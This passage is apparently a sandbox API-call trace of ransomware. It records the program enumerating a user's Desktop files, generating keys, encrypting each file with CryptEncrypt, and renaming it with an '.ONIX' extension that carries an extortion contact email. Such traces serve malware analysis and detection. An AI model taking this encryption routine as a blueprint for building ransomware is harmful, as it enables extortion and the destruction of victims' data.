nNumberOfBytesToUnlockLow=0x9cdb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.424] CloseHandle (hObject=0x4a4) returned 1 [0120.436] GetProcessHeap () returned 0x410000 [0120.436] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.436] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pc4n.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pc4n.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pc4n.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.438] GetProcessHeap () returned 0x410000 [0120.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0120.438] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f03cf40, ftCreationTime.dwHighDateTime=0x1d5da07, ftLastAccessTime.dwLowDateTime=0x4c90110, ftLastAccessTime.dwHighDateTime=0x1d5d984, ftLastWriteTime.dwLowDateTime=0x4c90110, ftLastWriteTime.dwHighDateTime=0x1d5d984, nFileSizeHigh=0x0, nFileSizeLow=0x12948, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RdPhKyqC7d.doc", cAlternateFileName="RDPHKY~1.DOC")) returned 1 [0120.438] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rdphkyqc7d.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.438] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.439] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12948, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.439] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.439] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.440] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.440] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.440] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.440] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.440] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc", dwFileAttributes=0x80) returned 1 [0120.440] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc") returned 53 [0120.440] GetProcessHeap () returned 0x410000 [0120.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x460008 [0120.440] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc" [0120.440] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.440] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=76104) returned 1 [0120.440] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x12948 [0120.441] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.441] GetProcessHeap () returned 0x410000 [0120.441] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.441] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.442] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.444] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.445] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12948) returned 0xf50048 [0120.447] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12948) returned 0xf62998 [0120.447] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.447] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x12948, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x12948, lpOverlapped=0x0) returned 1 [0120.449] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-76104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.449] WriteFile (in: hFile=0x4a4, lpBuffer=0xf62998*, nNumberOfBytesToWrite=0x12948, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf62998*, lpNumberOfBytesWritten=0x367f44c*=0x12948, lpOverlapped=0x0) returned 1 [0120.452] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12948, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.452] CloseHandle (hObject=0x4a4) returned 1 [0120.452] GetProcessHeap () returned 0x410000 [0120.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.452] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rdphkyqc7d.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RdPhKyqC7d.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rdphkyqc7d.doc.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.455] GetProcessHeap () returned 0x410000 [0120.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.455] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf30f8730, ftCreationTime.dwHighDateTime=0x1d5dcff, ftLastAccessTime.dwLowDateTime=0x565586f0, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0x565586f0, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0x944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rIb_.m4a", cAlternateFileName="")) returned 1 [0120.455] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rib_.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.455] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.455] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x944, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.455] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.456] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.456] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.456] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.457] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.457] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.457] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a", dwFileAttributes=0x80) returned 1 [0120.457] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a") returned 47 [0120.457] GetProcessHeap () returned 0x410000 [0120.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xce) returned 0x477600 [0120.457] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a" [0120.457] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.457] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2372) returned 1 [0120.457] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x944 [0120.457] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.457] GetProcessHeap () returned 0x410000 [0120.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.457] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.459] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.461] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.462] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.463] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x944) returned 0x4dab68 [0120.463] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x944) returned 0x4db4b8 [0120.463] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.463] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x944, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x944, lpOverlapped=0x0) returned 1 [0120.463] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-2372, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.463] WriteFile (in: hFile=0x4a4, lpBuffer=0x4db4b8*, nNumberOfBytesToWrite=0x944, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4db4b8*, lpNumberOfBytesWritten=0x367f44c*=0x944, lpOverlapped=0x0) returned 1 [0120.465] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x944, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.465] CloseHandle (hObject=0x4a4) returned 1 [0120.466] GetProcessHeap () returned 0x410000 [0120.466] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.466] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rib_.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rIb_.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rib_.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.468] GetProcessHeap () returned 0x410000 [0120.468] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0120.468] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1074fd80, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x1074fd80, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0xd7a0d00, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x66c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rvkjfc.exe", cAlternateFileName="")) returned 1 [0120.468] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0120.469] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.469] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0120.469] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.469] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.469] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.469] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe", dwFileAttributes=0x80) returned 1 [0120.470] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 49 [0120.470] GetProcessHeap () returned 0x410000 [0120.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x460008 [0120.470] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" [0120.470] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.470] GetProcessHeap () returned 0x410000 [0120.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.470] CloseHandle (hObject=0xffffffff) returned 0 [0120.470] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74872b0, ftCreationTime.dwHighDateTime=0x1d5dad9, ftLastAccessTime.dwLowDateTime=0x4f4ae620, ftLastAccessTime.dwHighDateTime=0x1d5e421, ftLastWriteTime.dwLowDateTime=0x4f4ae620, ftLastWriteTime.dwHighDateTime=0x1d5e421, nFileSizeHigh=0x0, nFileSizeLow=0x55b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sKYnG5VSS6bl.mp4", cAlternateFileName="SKYNG5~1.MP4")) returned 1 [0120.470] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\skyng5vss6bl.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.470] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.470] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x55b8, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.470] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.470] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.471] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.471] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.471] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.471] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.471] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4", dwFileAttributes=0x80) returned 1 [0120.472] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4") returned 55 [0120.472] GetProcessHeap () returned 0x410000 [0120.472] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x460008 [0120.472] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4" [0120.472] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.472] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=21944) returned 1 [0120.472] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x55b8 [0120.472] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.472] GetProcessHeap () returned 0x410000 [0120.472] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.472] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.472] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.474] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.477] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x55b8) returned 0x4dab68 [0120.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x55b8) returned 0x4e0128 [0120.478] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.478] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x55b8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x55b8, lpOverlapped=0x0) returned 1 [0120.479] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-21944, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.479] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e0128*, nNumberOfBytesToWrite=0x55b8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0128*, lpNumberOfBytesWritten=0x367f44c*=0x55b8, lpOverlapped=0x0) returned 1 [0120.480] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x55b8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.480] CloseHandle (hObject=0x4a4) returned 1 [0120.482] GetProcessHeap () returned 0x410000 [0120.482] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.482] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\skyng5vss6bl.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sKYnG5VSS6bl.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\skyng5vss6bl.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.484] GetProcessHeap () returned 0x410000 [0120.484] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.484] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe0d900, ftCreationTime.dwHighDateTime=0x1d5e479, ftLastAccessTime.dwLowDateTime=0x500f93e0, ftLastAccessTime.dwHighDateTime=0x1d5d827, ftLastWriteTime.dwLowDateTime=0x500f93e0, ftLastWriteTime.dwHighDateTime=0x1d5d827, nFileSizeHigh=0x0, nFileSizeLow=0xff0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t0hBtW4x qo8SPpZnKfp.ods", cAlternateFileName="T0HBTW~1.ODS")) returned 1 [0120.484] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS 